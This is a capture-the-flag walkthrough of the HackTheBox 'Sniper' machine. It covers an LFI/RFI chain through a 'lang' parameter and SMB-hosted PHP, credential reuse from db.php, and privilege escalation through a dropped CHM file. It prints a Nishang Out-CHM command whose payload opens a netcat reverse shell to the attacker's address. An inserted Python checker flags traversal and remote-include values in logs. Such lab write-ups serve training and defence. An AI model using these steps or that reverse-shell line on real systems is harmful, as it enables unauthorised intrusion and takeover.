HackTheBox Writeup — Sniper
Hello Guys, I am Faisal Husaini. My username on HTB is “kNgF”. Also join me on Discord.
The IP of this box is 10.10.10.151
Port Scan
Running masscan on it, we get
masscan -p1-65535,U:1-65535 10.10.10.151 --rate=1000 -e tun0
Running NMAP against the discovered Open Ports
Since only 4 ports are open and the most interesting one is the web server, we move to the web part first.
Running Gobuster against the web
We see pretty good results, so we move on to the /blog directory.
Clicking on the Language drop-down
The parameter “lang” is a potential LFI candidate, so we try some entries on it.
While trying to access Windows files like “Windows/system32/drivers/etc/hosts” and “Windows/win.ini”, we get different results, but because of how the web app renders the page we cannot see them clearly, so we look at the page source.
We see that the LFI works. Now we try for RFI, creating a simple phpinfo() PHP file and testing it.
For RFI, we will use Samba to share the file so that we can test it.
Here we first tried the smbserver tool from Impacket, which unfortunately did not work in this case, so we used Samba instead, which we had to install and set up on our local machine, first by installing it with “apt-get install samba”.
Here is the PHP script we will test; we also set up the Samba config file.
Now we start the smbd server using the command “service smbd start”
Moving on to the vulnerable URL, we test our PHP file.
Here we clearly see that the RFI works. Now we move on to getting command execution, for which we create one more simple PHP file.
We can use this to get command execution; let’s test it.
We see that it was accessed successfully. Since we didn’t provide any parameter, we got no results, so let’s test a simple “dir” command.
We get results; to see the output in a readable format, we need to check the page source.
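A defensive aside added here, not part of the original writeup: a small Python checker that runs over constructed IIS-style log lines and flags “lang” values shaped like the traversal, UNC-share and URL includes used above. The log format, the share name and the file names are assumptions; the attacker address is the one used later in this writeup.

```python
"""Flag LFI/RFI-style values of the `lang` query parameter in web server logs.
Added defensive example, not code from the original writeup. Log lines are
constructed in a simplified IIS-like format: date time method uri-stem uri-query status."""
import re
from urllib.parse import parse_qs, unquote

# Patterns a language selector never legitimately needs: directory traversal, absolute
# Windows/Unix paths, UNC shares (\\host\share, what the SMB-based RFI relies on), URL wrappers.
SUSPICIOUS = [
    ("traversal", re.compile(r"\.\.[\\/]")),
    ("absolute_path", re.compile(r"^(?:[A-Za-z]:|[\\/])")),
    ("unc_share", re.compile(r"^(?:\\\\|//)[^\\/]+[\\/]")),
    ("url_wrapper", re.compile(r"^[A-Za-z][A-Za-z0-9+.-]*://")),
]

# Constructed sample log; 10.10.14.165 is the attacker address used in the writeup.
SAMPLE_LOG = [
    "2019-12-01 10:00:01 GET /blog/index.php lang=blog-en.php 200",
    r"2019-12-01 10:00:05 GET /blog/index.php lang=..\..\Windows\win.ini 200",
    r"2019-12-01 10:00:09 GET /blog/index.php lang=\\10.10.14.165\share\info.php 200",
    "2019-12-01 10:00:12 GET /blog/index.php lang=%2e%2e%2fWindows%2fwin.ini 200",
    "2019-12-01 10:00:15 GET /blog/index.php lang=http://10.10.14.165/x.php 500",
]


def classify_lang(value: str) -> list[str]:
    """Return the names of every suspicious pattern a lang value matches."""
    decoded = unquote(value)  # one extra decode catches double-encoded traversal
    return [name for name, rx in SUSPICIOUS if rx.search(decoded)]


def scan_log(lines: list[str]) -> list[tuple[str, list[str]]]:
    """Return (uri-query, reasons) for each request whose lang parameter looks malicious."""
    findings = []
    for line in lines:
        parts = line.split()
        if len(parts) < 6 or parts[2] != "GET":
            continue
        query = parts[4]
        # parse_qs already percent-decodes each value once
        for value in parse_qs(query, keep_blank_values=True).get("lang", []):
            reasons = classify_lang(value)
            if reasons:
                findings.append((query, reasons))
    return findings


if __name__ == "__main__":
    for query, reasons in scan_log(SAMPLE_LOG):
        print(f"{query:50} {', '.join(reasons)}")
```

The same allow-list idea (only accepting known language file names) is what the vulnerable include itself should enforce; the log check is the detection side of that control.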
But it’s a pain to use Windows commands like this, so we try to get a reverse shell connection.
So I also upload a netcat Windows binary to our SMB share so that we can use it.
The above is the final payload used for the reverse shell; looking back at the netcat listener
We got a reverse shell successfully, so now we move further into enumeration.
As we were spawned in the webroot directory, and we remember from the Gobuster scan that there was a directory named user, we move into that directory and list the files and folders.
There is an interesting PHP file named db.php which might contain some creds.
We see a dbuser password, which might also be the password for a user account, so we check the users present on the machine.
We see a user “Chris” on the box, so we use PowerShell to switch to that user with the commands below.
As soon as we enter the last command, we get a new user prompt.
We can see that we switched to the Chris user successfully. Now we move on to the user flag, which is usually located under the user’s Desktop folder.
But we see that we can’t run any command here except whoami, maybe due to an improper shell, so we try to get another one by the same method.
Looking back at the other netcat listener
We have a proper reverse shell now, so we go back to getting the user flag.
Moving on to the priv esc part
Privilege Escalation
Looking at the main directory
We see a not-so-common folder, Docs; we enter it and list its contents.
We see 2 files, one a txt file and the other a pdf file. Looking at the contents of the note.txt file
We see a message for the user Chris; looking closely, the Sniper CEO says to drop a file. Maybe there is an automated task running.
So we will create a CHM file using Nishang’s Out-CHM.ps1 PowerShell script in a Windows VM.
Here is the script we used, along with the command at the end
Out-CHM -Payload “C:\Users\Chris\Desktop\nc64.exe -e powershell.exe 10.10.14.165 9003” -HHCPath “C:\Program Files (x86)\HTML Help Workshop”
As soon as we run the script, the CHM file gets created in the current location, i.e. the Desktop folder, so we now copy it to our Linux machine and then transfer it to the remote Sniper machine.
So here we upload the CHM file to the /Docs folder, having set up our netcat listener on the other end beforehand. As soon as the file is uploaded, we move to the listener.
We immediately got a reverse shell connection, this time as Administrator, and move further to get the root flag, which is usually stored under the Desktop folder.